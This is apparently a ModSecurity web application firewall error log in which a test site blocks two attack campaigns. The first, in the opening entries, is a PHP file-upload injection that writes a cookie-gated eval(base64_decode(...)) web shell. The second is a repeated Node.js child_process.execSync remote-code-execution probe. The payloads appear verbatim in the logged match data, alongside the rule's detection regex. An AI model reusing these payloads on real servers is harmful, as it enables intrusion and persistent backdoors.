[Wed Feb 25 19:14:02.959088 2026] [:error] [pid 2312879] [client 46.149.66.101:42470] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZ876mXxsr5IXP-ltRib7QAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/l/l/ll88364f428d25.phar
[Wed Feb 25 19:14:03.328884 2026] [:error] [pid 2312879] [client 46.149.66.101:42470] [client 46.149.66.101] ModSecurity: Rule 7f453e629be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/l/ll88364f428d25.php8"] [unique_id "aZ8762Xxsr5IXP-ltRib7gAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 25 19:14:03.329355 2026] [:error] [pid 2312879] [client 46.149.66.101:42470] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/l/ll88364f428d25.php8"] [unique_id "aZ8762Xxsr5IXP-ltRib7gAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 25 19:14:03.331805 2026] [:error] [pid 2312879] [client 46.149.66.101:42470] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/l/ll88364f428d25.php8"] [unique_id "aZ8762Xxsr5IXP-ltRib7gAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 25 19:14:03.331988 2026] [:error] [pid 2312879] [client 46.149.66.101:42470] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/l/l/ll88364f428d25.php8"] [unique_id "aZ8762Xxsr5IXP-ltRib7gAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 26 02:06:21.228433 2026] [:error] [pid 2332243] [client 195.178.110.33:40692] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZ-cjbSZ0-i57Co9sRVoXQAAAAo"]
[Thu Feb 26 02:06:21.229012 2026] [:error] [pid 2332243] [client 195.178.110.33:40692] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZ-cjbSZ0-i57Co9sRVoXQAAAAo"]
[Thu Feb 26 02:06:21.229184 2026] [:error] [pid 2332243] [client 195.178.110.33:40692] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZ-cjbSZ0-i57Co9sRVoXQAAAAo"]
[Thu Feb 26 02:06:21.285203 2026] [:error] [pid 2332243] [client 195.178.110.33:40692] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aZ-cjbSZ0-i57Co9sRVoXgAAAAo"]
[Thu Feb 26 02:06:21.285681 2026] [:error] [pid 2332243] [client 195.178.110.33:40692] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aZ-cjbSZ0-i57Co9sRVoXgAAAAo"]
[Thu Feb 26 02:06:21.285852 2026] [:error] [pid 2332243] [client 195.178.110.33:40692] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/index.json"] [unique_id "aZ-cjbSZ0-i57Co9sRVoXgAAAAo"]
[Thu Feb 26 02:06:21.472457 2026] [:error] [pid 2330791] [client 195.178.110.33:40698] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aZ-cjQ3HqGC30X9HPoEn5AAAAAM"]
[Thu Feb 26 02:06:21.472986 2026] [:error] [pid 2330791] [client 195.178.110.33:40698] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aZ-cjQ3HqGC30X9HPoEn5AAAAAM"]
[Thu Feb 26 02:06:21.473157 2026] [:error] [pid 2330791] [client 195.178.110.33:40698] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/endpoint"] [unique_id "aZ-cjQ3HqGC30X9HPoEn5AAAAAM"]
[Thu Feb 26 02:06:21.580393 2026] [:error] [pid 2330791] [client 195.178.110.33:40698] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aZ-cjQ3HqGC30X9HPoEn5QAAAAM"]
[Thu Feb 26 02:06:21.580895 2026] [:error] [pid 2330791] [client 195.178.110.33:40698] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aZ-cjQ3HqGC30X9HPoEn5QAAAAM"]
[Thu Feb 26 02:06:21.581067 2026] [:error] [pid 2330791] [client 195.178.110.33:40698] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/static/chunks/pages/"] [unique_id "aZ-cjQ3HqGC30X9HPoEn5QAAAAM"]
[Thu Feb 26 02:06:21.639729 2026] [:error] [pid 2330791] [client 195.178.110.33:40698] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aZ-cjQ3HqGC30X9HPoEn5gAAAAM"]
[Thu Feb 26 02:06:21.640268 2026] [:error] [pid 2330791] [client 195.178.110.33:40698] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aZ-cjQ3HqGC30X9HPoEn5gAAAAM"]
[Thu Feb 26 02:06:21.640452 2026] [:error] [pid 2330791] [client 195.178.110.33:40698] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/[[...slug]]"] [unique_id "aZ-cjQ3HqGC30X9HPoEn5gAAAAM"]
[Thu Feb 26 02:06:37.920640 2026] [:error] [pid 2331666] [client 195.178.110.33:32774] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aZ-cnbD-ZD-CADN63NcgxAAAAAg"]
[Thu Feb 26 02:06:37.921191 2026] [:error] [pid 2331666] [client 195.178.110.33:32774] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aZ-cnbD-ZD-CADN63NcgxAAAAAg"]
[Thu Feb 26 02:06:37.921366 2026] [:error] [pid 2331666] [client 195.178.110.33:32774] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/home.json"] [unique_id "aZ-cnbD-ZD-CADN63NcgxAAAAAg"]
[Thu Feb 26 02:06:46.350746 2026] [:error] [pid 2330790] [client 195.178.110.33:35560] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aZ-cpoCbt-ue5ARpbmjn8AAAAAI"]
[Thu Feb 26 02:06:46.351282 2026] [:error] [pid 2330790] [client 195.178.110.33:35560] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aZ-cpoCbt-ue5ARpbmjn8AAAAAI"]
[Thu Feb 26 02:06:46.351442 2026] [:error] [pid 2330790] [client 195.178.110.33:35560] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aZ-cpoCbt-ue5ARpbmjn8AAAAAI"]
[Thu Feb 26 02:06:49.522470 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:cmd: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo VULN_TEST\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aZ-cqaw_J46bKuq0K9UHYwAAAAk"]
[Thu Feb 26 02:06:49.523026 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aZ-cqaw_J46bKuq0K9UHYwAAAAk"]
[Thu Feb 26 02:06:49.523208 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/test"] [unique_id "aZ-cqaw_J46bKuq0K9UHYwAAAAk"]
[Thu Feb 26 02:06:49.579194 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:param. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:param: \\x0a(function(){\\x0a\\x09try {\\x0a\\x09\\x09var cmd = \\x22echo \\x5c\\x5c'VULN_TEST\\x5c\\x5c'\\x22;\\x0a\\x09\\x09var result = require('child_process').execSync(cmd, {encoding: 'utf8'});\\x0a\\x09\\x09return btoa(result);\\x0a\\x09} catch(e) {\\x0a\\x09\\x09return btoa(e.toString());\\x0a\\x09}\\x0a})()\\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce"] [tag "attack-injection-nodejs"] [tag "OWASP_CRS/WEB_ATTACK/NODEJS_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZ-cqaw_J46bKuq0K9UHZAAAAAk"]
[Thu Feb 26 02:06:49.579711 2026] [:error] [pid 2332242] [client 195.178.110.33:35570] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/_next/data/buildId/page.json"] [unique_id "aZ-cqaw_J46bKuq0K9UHZAAAAAk"]
